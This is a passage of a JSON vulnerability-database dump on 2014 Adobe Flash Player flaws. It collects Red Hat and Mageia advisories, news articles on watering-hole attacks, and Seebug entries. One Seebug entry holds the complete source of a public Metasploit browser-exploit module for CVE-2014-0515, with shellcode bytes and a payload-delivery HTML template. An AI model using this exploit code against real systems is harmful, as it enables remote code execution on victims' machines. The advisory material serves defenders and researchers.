(CVE-2014-0504)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.346.\n", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "redhat", "title": "(RHSA-2014:0289) Moderate: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2018-06-07T05:04:11", "id": "RHSA-2014:0289", "href": "https://access.redhat.com/errata/RHSA-2014:0289", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-05-26T10:21:36", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed in the Adobe Security Bulletin APSB14-13, listed\nin the References section.\n\nA flaw was found in the way flash-plugin displayed certain SWF content. 
An\nattacker could use this flaw to create a specially crafted SWF file that\nwould cause flash-plugin to crash or, potentially, execute arbitrary code\nwhen the victim loaded a page containing the malicious SWF content.\n(CVE-2014-0515)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.356.\n", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "redhat", "title": "(RHSA-2014:0447) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2018-06-07T05:04:18", "id": "RHSA-2014:0447", "href": "https://access.redhat.com/errata/RHSA-2014:0447", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2023-09-20T15:33:34", "description": "Adobe Flash Player 11.2.202.350 contains fixes to critical security vulnerabilities found in earlier versions that could cause a crash and potentially allow an attacker to remotely take control of the affected system. This update resolves a use-after-free vulnerability that could result in arbitrary code execution (CVE-2014-0506). This update resolves a buffer overflow vulnerability that could result in arbitrary code execution (CVE-2014-0507). This update resolves a security bypass vulnerability that could lead to information disclosure (CVE-2014-0508). This update resolves a cross-site-scripting vulnerability (CVE-2014-0509). 
\n", "cvss3": {}, "published": "2014-04-09T15:40:40", "type": "mageia", "title": "Updated flash-player-plugin package fixes multiple vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2014-04-09T15:40:40", "id": "MGASA-2014-0169", "href": "https://advisories.mageia.org/MGASA-2014-0169.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-20T15:33:34", "description": "Adobe Flash Player 11.2.202.341 contains fixes to critical security vulnerabilities found in earlier versions that could cause a crash and potentially allow an attacker to remotely take control of the affected system. This update resolves a stack overflow vulnerability that could result in arbitrary code execution (CVE-2014-0498). This update resolves a memory leak vulnerability that could be used to defeat memory address layout randomization (CVE-2014-0499). This update resolves a double free vulnerability that could result in arbitrary code execution (CVE-2014-0502). Adobe is aware of reports that CVE-2014-0502 is being exploited in the wild. 
\n", "cvss3": {}, "published": "2014-02-21T18:20:39", "type": "mageia", "title": "Updated flash-player-plugin package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2014-02-21T18:20:39", "id": "MGASA-2014-0091", "href": "https://advisories.mageia.org/MGASA-2014-0091.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-20T15:33:34", "description": "Adobe Flash Player 11.2.202.346 contains fixes to important vulnerabilities found in earlier versions that could allow a remote attacker to bypass security restrictions or to access sensitive information. This update resolves a vulnerability that could be used to bypass the same origin policy (CVE-2014-0503). This update resolves a vulnerability that could be used to read the contents of the clipboard (CVE-2014-0504). 
\n", "cvss3": {}, "published": "2014-03-12T16:22:25", "type": "mageia", "title": "Updated flash-player-plugin packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-12T16:22:25", "id": "MGASA-2014-0128", "href": "https://advisories.mageia.org/MGASA-2014-0128.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-09-20T15:33:34", "description": "Adobe Flash Player 11.2.202.356 contains a fix to a critical security vulnerability found in earlier versions that could potentially allow an attacker to take control of the affected system. This update resolves a buffer overflow vulnerability that could result in arbitrary code execution (CVE-2014-0515). 
\n", "cvss3": {}, "published": "2014-04-30T14:31:23", "type": "mageia", "title": "Updated flash-player-plugin package fixes CVE-2014-0515\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-30T14:31:23", "id": "MGASA-2014-0198", "href": "https://advisories.mageia.org/MGASA-2014-0198.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:39", "description": "[](<https://4.bp.blogspot.com/--507JkCFoZA/UwhC21o6XWI/AAAAAAAAaRw/G5qvKdfg_Sg/s1600/Adobe+Flash+Palayer+emergency+patch+update.png>)\n\nSecurity Firm FireEye has [uncovered](<https://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html>) yet another critical zero-day vulnerability in widely used Adobe Flash Software and Adobe has been forced to issue a second [emergency patch update](<https://helpx.adobe.com/security/products/flash-player/apsb14-07.html>) in less than a month. \n \nAll versions of Adobe Flash Player released before today's patch are vulnerable to the zero-day exploit and the patch addresses a critical vulnerability _CVE-2014-0502_, being used in a watering hole attack -dubbed \"_Operation Greedywonk\", _that allows attackers to remotely take control of infected systems. 
\n \nThe vulnerability affects the latest versions of Flash and is reported to be targeting the websites of three non-profit institutions, whose visitors are being redirected to a malicious server hosting the zero-day exploit. \n \n\"_Visitors to the Peter G. Peterson Institute for International Economics (www.piie[.]com) were redirected to an exploit server hosting this Flash zero-day through a hidden iframe_.\" FireEye said. \n \n\n\nSecurity updates tackle a number of flaws including: \n\n\n * CVE-2014-0498 stack overflow vulnerability, if exploited, can execute arbitrary code\n * CVE-2014-0499 memory leak vulnerability, if exploited, can defeat memory address layout randomization\n * CVE-2014-0502 double free vulnerability, if exploited, could result in arbitrary code execution\nReports confirmed that an exploit for _CVE-2014-0502_ exists in the wild that allows an attacker to bypass '_Address Space Layout Randomization (ASLR)_' protections on Windows XP, Windows 7 with Java version 1.6 or outdated Office 2007 or 2010 to execute the malicious code.\n\n \n**Anatomy of the attack:** Antivirus firm** '**[Symantec](<http://www.symantec.com/connect/blogs/new-flash-zero-day-linked-yet-more-watering-hole-attacks>)' explained:\n\n> **\"**_This attack technique is known as a watering hole attack. In this case the target visits a compromised website that contains an IFrame inserted by the attackers in order to redirect the target to another website (giftserv.hopto.org). This new site loads a malicious index.php file (Trojan.Malscript) which checks whether the victim is running a 32-bit or 64-bit system. Depending on the results, a malicious index.html file (also Trojan.Malscript) and additional components are also downloaded from either the 32-bit or 64-bit folders hosted on the attacker\u2019s server. The malicious index.html file then loads the cc.swf Adobe Flash file (Trojan.Swifi) containing the zero-day. 
Once exploited, a logo.gif image file is downloaded containing encrypted shellcode which downloads and executes the malicious server.exe (Backdoor.Jolob) payload_.\n\nA very successful watering hole attack in early 2013 targeted mobile app developers and infected the internal networks of Apple, Facebook, Microsoft and Twitter, among other companies. \n \nFortunately, only certain computers are vulnerable to those further exploits: all Windows XP machines, and Windows 7 machines that have Java 1.6 or Microsoft Office 2007 or 2010 installed. \"_Users can mitigate the threat by upgrading from Windows XP and updating Java and Office,_\" FireEye researchers said. \n \nTo determine which version of Flash you are running, you can visit Adobe\u2019s [website here](<https://www.adobe.com/software/flash/about/>). Users are recommended to update their Adobe Flash Player to address this critical vulnerability. You should download it from the [Adobe Flash Player Download](<https://get.adobe.com/flashplayer/>) Centre.\n", "cvss3": {}, "published": "2014-02-21T19:36:00", "type": "thn", "title": "Adobe releases another Emergency Security Patch for Flash Player", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2014-02-22T06:36:51", "id": "THN:F302CDA9688F8F9725A0957D7EE3FB30", "href": "https://thehackernews.com/2014/02/adobe-releases-another-emergency.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:58", "description": "[](<https://3.bp.blogspot.com/-E_ub3dXk4QM/Ux88XhB2NWI/AAAAAAAAaiE/5llUerdHQcA/s1600/adobe-flash-player.jpg>)\n\nAdobe has released security updates to address important vulnerabilities in [Adobe Flash Player](<https://thehackernews.com/search/label/Adobe%20Flash%20Player>) 12.0.0.70 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.341 and earlier versions for Linux. 
\n\n\n \n\n\nThe new build intends to address following vulnerabilities in Adobe Flash Player:\n\n * _**CVE-2014-0503**,_ reported by security researcher, '_Masato Kinugawa_', that lets_ _attackers bypass the same-origin policy. Attackers can exploit this issue to access resources from another origin in the context of another domain. This can facilitate cross-site request-forgery attacks.\n * **CVE-2014-0504**, reported by '_Jordan Milne_',** **that could be used to read the contents of the clipboard(). The Clipboard can be used to store data, such as text and images, but flaw could allow hacker to stuff malware URLs onto your clipboard.\n\nAdobe Security Bulletin [APSB14-08](<https://helpx.adobe.com/security/products/flash-player/apsb14-08.html>) tagged the updates with **Priority 2**, '_This update resolves vulnerabilities in a product that has historically been at elevated risk. There are currently no known exploits._'\n\n[](<https://3.bp.blogspot.com/-ucGdISLzv6M/Ux824VFG-EI/AAAAAAAAahs/-sxRbOXccnM/s1600/Adobe-Flash-Player-download.png>)\n\nAdobe recommends users to update their software installations to Adobe Flash player 12.0.0.77 i.e. 
Available for [download from Adobe Center](<https://www.adobe.com/go/getflash>).\n", "cvss3": {}, "published": "2014-03-11T05:45:00", "type": "thn", "title": "Adobe releases important Security Updates for Flash Player", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-11T16:45:22", "id": "THN:16D1A0509FDE824EA23D52FEEC5FBBBD", "href": "https://thehackernews.com/2014/03/adobe-releases-important-security.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T17:27:35", "description": "CVE ID:CVE-2014-0509 \r\n\r\nAdobe Flash Player\u662f\u4e00\u6b3eFlash\u6587\u4ef6\u5904\u7406\u7a0b\u5e8f\u3002Adobe Air\u662f\u4e00\u6b3eAdobe\u516c\u53f8\u51fa\u54c1\u7684\u8de8\u64cd\u4f5c\u7cfb\u7edf\u7684\u8fd0\u884c\u65f6\u5e93\u3002\r\n\r\nAdobe Flash Player/AIR\u5b58\u5728\u672a\u660e\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u6ce8\u5165\u6076\u610f\u811a\u672c\u6216HTML\u4ee3\u7801\uff0c\u5f53\u6076\u610f\u6570\u636e\u88ab\u67e5\u770b\u65f6\uff0c\u53ef\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u6216\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\u3002\n0\nAdobe Flash Player 12.0.0.77\r\nAdobe Flash Player 11.2.202.346\r\nAdobe Flash Player 11.7.700.272\r\nAdobe AIR 4.0.0.1628\nAdobe Flash Player 13.0.0.182, 11.2.202.350\u6216Adobe AIR 13.0.0.83\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.adobe.com", "cvss3": {}, "published": "2014-04-11T00:00:00", "title": "Adobe Flash Player/AIR\u672a\u660e\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0509"], "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62134", "id": "SSV:62134", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T13:46:20", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Adobe Flash Player Shader Buffer Overflow", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86558", "id": "SSV:86558", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "Adobe Flash Player Shader Buffer Overflow",\r\n 'Description' => %q{\r\n This module exploits a buffer overflow vulnerability in Adobe Flash Player. The\r\n vulnerability occurs in the flash.Display.Shader class, when setting specially\r\n crafted data as its bytecode, as exploited in the wild in April 2014. 
This module\r\n has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over\r\n Windows XP SP3, Windows 7 SP1 and Windows 8.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0515'],\r\n ['BID', '67092'],\r\n ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],\r\n ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 2000,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => stack_adjust\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'Retries' => false,\r\n 'EXITFUNC' => "thread"\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",\r\n :method => "LoadMovie",\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^11\\./ || ver =~ /^12\\./ || (ver =~ /^13\\./ && ver <= '13.0.0.182') }\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => "Apr 28 2014",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def stack_adjust\r\n adjust = "\\x64\\xa1\\x18\\x00\\x00\\x00" # mov eax, fs:[0x18 # get teb\r\n adjust << "\\x83\\xC0\\x08" # add eax, byte 8 # get pointer to stacklimit\r\n adjust << "\\x8b\\x20" # mov esp, [eax] # put esp at stacklimit\r\n adjust << "\\x81\\xC4\\x30\\xF8\\xFF\\xFF" # add esp, -2000 # plus a little offset\r\n\r\n adjust\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n 
print_status("Request: #{request.uri}")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status("Sending SWF...")\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status("Sending HTML...")\r\n tag = retrieve_tag(cli, request)\r\n profile = get_profile(tag)\r\n profile[:tried] = false unless profile.nil? # to allow request the swf\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"\r\n flash_payload = ""\r\n get_payload(cli,target_info).unpack("V*").each do |i|\r\n flash_payload << "0x#{i.to_s(16)},"\r\n end\r\n flash_payload.gsub!(/,$/, "")\r\n\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />\r\n <param name="movie" value="<%=swf_random%>" />\r\n <param name="allowScriptAccess" value="always" />\r\n <param name="FlashVars" value="sh=<%=flash_payload%>" />\r\n <param name="Play" value="true" />\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" )\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86558", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:27:36", "description": "CVE ID:CVE-2014-0508\r\n\r\nAdobe Flash Player\u662f\u4e00\u6b3eFlash\u6587\u4ef6\u5904\u7406\u7a0b\u5e8f\u3002Adobe Air\u662f\u4e00\u6b3eAdobe\u516c\u53f8\u51fa\u54c1\u7684\u8de8\u64cd\u4f5c\u7cfb\u7edf\u7684\u8fd0\u884c\u65f6\u5e93\u3002\r\n\r\nAdobe Flash 
Player/AIR\u5b58\u5728\u672a\u660e\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u6784\u5efa\u6076\u610f\u6587\u4ef6\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u7ed5\u8fc7\u5b89\u5168\u9650\u5236\uff0c\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u3002\n0\nAdobe Flash Player 12.0.0.77\r\nAdobe Flash Player 11.2.202.346\r\nAdobe Flash Player 11.7.700.272\r\nAdobe AIR 4.0.0.1628\nAdobe Flash Player 13.0.0.182, 11.2.202.350\u6216Adobe AIR 13.0.0.83\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.adobe.com", "cvss3": {}, "published": "2014-04-11T00:00:00", "title": "Adobe Flash Player/AIR\u672a\u660e\u5b89\u5168\u7ed5\u8fc7\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0508"], "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62133", "id": "SSV:62133", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:27:40", "description": "CVE ID:CVE-2014-0507\r\n\r\nAdobe Flash Player\u662f\u4e00\u6b3eFlash\u6587\u4ef6\u5904\u7406\u7a0b\u5e8f\u3002Adobe Air\u662f\u4e00\u6b3eAdobe\u516c\u53f8\u51fa\u54c1\u7684\u8de8\u64cd\u4f5c\u7cfb\u7edf\u7684\u8fd0\u884c\u65f6\u5e93\u3002\r\n\r\nAdobe Flash Player/AIR\u5b58\u5728\u672a\u660e\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u6784\u5efa\u6076\u610f\u6587\u4ef6\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u4f7f\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u6216\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nAdobe Flash Player 12.0.0.77\r\nAdobe Flash Player 11.2.202.346\r\nAdobe Flash Player 11.7.700.272\r\nAdobe AIR 4.0.0.1628\nAdobe Flash Player 13.0.0.182, 11.2.202.350\u6216Adobe AIR 
13.0.0.83\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.adobe.com", "cvss3": {}, "published": "2014-04-11T00:00:00", "title": "Adobe Flash Player/AIR\u672a\u660e\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0507"], "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62132", "id": "SSV:62132", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:33:40", "description": "BUGTRAQ ID: 65704\r\nCVE(CAN) ID: CVE-2014-0498\r\n\r\nAdobe Flash Player\u662f\u4e00\u4e2a\u96c6\u6210\u7684\u591a\u5a92\u4f53\u64ad\u653e\u5668\u3002Adobe AIR\u662f\u9488\u5bf9\u7f51\u7edc\u4e0e\u684c\u9762\u5e94\u7528\u7684\u7ed3\u5408\u6240\u5f00\u53d1\u51fa\u6765\u7684\u6280\u672f\uff0c\u53ef\u4ee5\u4e0d\u5fc5\u7ecf\u7531\u6d4f\u89c8\u5668\u800c\u5bf9\u7f51\u7edc\u4e0a\u7684\u4e91\u7aef\u7a0b\u5f0f\u505a\u63a7\u5236\u3002\r\n\r\nAdobe Flash Player\u53caAIR\u5728\u5904\u7406\u542b\u6709\u7279\u5236Flash\u5185\u5bb9\u7684\u6076\u610f\u7f51\u9875\u65f6\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u5305\u62ec\u6808\u6ea2\u51fa\u3001\u5185\u5b58\u6cc4\u9732\u3001\u53cc\u91cd\u91ca\u653e\u6f0f\u6d1e\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8fd9\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6700\u7ec8\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\u3002\r\n0\r\nAdobe Flash Player < 12.0.0.44\r\nAdobe Flash Player < 11.2.202.336\r\nAdobe AIR 4.0.0.1390\r\nAdobe AIR 3.9.0.1390 SDK\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\nAdobe\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08apsb14-07\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\napsb14-07\uff1aSecurity updates available for Adobe Flash 
Player\r\n\u94fe\u63a5\uff1ahttp://helpx.adobe.com/security/products/flash-player/apsb14-07.html", "cvss3": {}, "published": "2014-02-21T00:00:00", "type": "seebug", "title": "Adobe Flash Player\u53caAIR\u8fdc\u7a0b\u6808\u6ea2\u51fa\u6f0f\u6d1e(CVE-2014-0498)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0498"], "modified": "2014-02-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61526", "id": "SSV:61526", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:30:35", "description": "CVE(CAN) ID: CVE-2014-0506\r\n\r\nAdobe Flash Player\u662f\u4e00\u4e2a\u96c6\u6210\u7684\u591a\u5a92\u4f53\u64ad\u653e\u5668\u3002\r\n\r\nAdobe Flash Player 12.0.0.77 (Windows)\u7248\u672c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u91ca\u653e\u540e\u91cd\u5229\u7528\u5b89\u5168\u6f0f\u6d1e\uff0c\u53ef\u4f7f\u653b\u51fb\u8005\u5229\u7528\u6b64\u6f0f\u6d1e\u7ed5\u8fc7IE\u6c99\u76d2\u4fdd\u62a4\u673a\u5236\u5e76\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nAdobe Flash Player 12.0.0.77\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\nhttp://www.adobe.com/support/security/", "cvss3": {}, "published": "2014-03-28T00:00:00", "title": "Adobe Flash Player\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0506"], "modified": "2014-03-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61978", "id": "SSV:61978", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:32:54", "description": "BUGTRAQ ID: 65703\r\nCVE(CAN) ID: 
